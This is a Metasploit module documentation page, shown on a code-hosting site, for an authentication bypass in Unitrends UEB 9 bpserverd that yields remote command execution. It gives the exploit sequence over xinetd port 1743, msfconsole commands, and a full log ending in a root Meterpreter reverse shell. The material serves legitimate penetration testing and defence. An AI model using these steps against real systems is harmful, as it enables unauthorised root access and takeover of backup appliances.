adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c0b4e7701fcaa86e72defb313af91efa4e7669f7
metasploit-gs/documentation/modules/exploit/linux/misc/ueb9_bpserverd.md
T
caleBot e8de6a46d5 Update ueb9_bpserverd.md
2017-10-20 12:21:17 -06:00

73 lines
2.7 KiB
Markdown
Raw Blame History

## Vulnerable Application
Unitrends UEB 9 bpserverd authentication bypass RCE
This exploit uses roughly the same process to gain root execution
as does the apache user on the Unitrends appliance. The process is
something like this:
1. Connect to xinetd process (it's usually running on port 1743)
2. This process will send something like: `?A,Connect36092`
3. Initiate a second connection to the port specified
in the packet from xinetd (36092 in this example)
4. send a specially crafted packet to xinetd, containing the
command to be executed as root
5. Receive command output from the connection to port 36092
6. Close both connections
## Verification Steps
1. ```use exploit/linux/misc/ueb9_bpserverd ```
2. ```set lhost [IP]```
3. ```set rhost [IP]```
4. ```exploit```
5. A meterpreter session should have been opened successfully
## Scenarios
### UEB 9.1 on CentOS 6.5
```
msf > use exploit/linux/misc/ueb9_bpserverd
msf exploit(ueb9_bpserverd) > set rhost 10.0.0.230
rhost => 10.0.0.230
msf exploit(ueb9_bpserverd) > set lhost 10.0.0.141
lhost => 10.0.0.141
msf exploit(ueb9_bpserverd) > exploit
[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 10.0.0.230:1743 - 10.0.0.230:1743 - pwn'ng ueb 9....
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port recieved: 45425
[*] 10.0.0.230:1743 - Connecting to 45425
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress - 26.71% done (199/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port recieved: 40889
[*] 10.0.0.230:1743 - Connecting to 40889
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress - 53.56% done (399/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port recieved: 40016
[*] 10.0.0.230:1743 - Connecting to 40016
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress - 80.27% done (598/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port recieved: 53649
[*] 10.0.0.230:1743 - Connecting to 53649
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] Sending stage (826872 bytes) to 10.0.0.230
[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33715) at 2017-10-06 11:33:56 -0400
[*] 10.0.0.230:1743 - Command Stager progress - 100.00% done (745/745 bytes)
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
```
Reference in New Issue View Git Blame Copy Permalink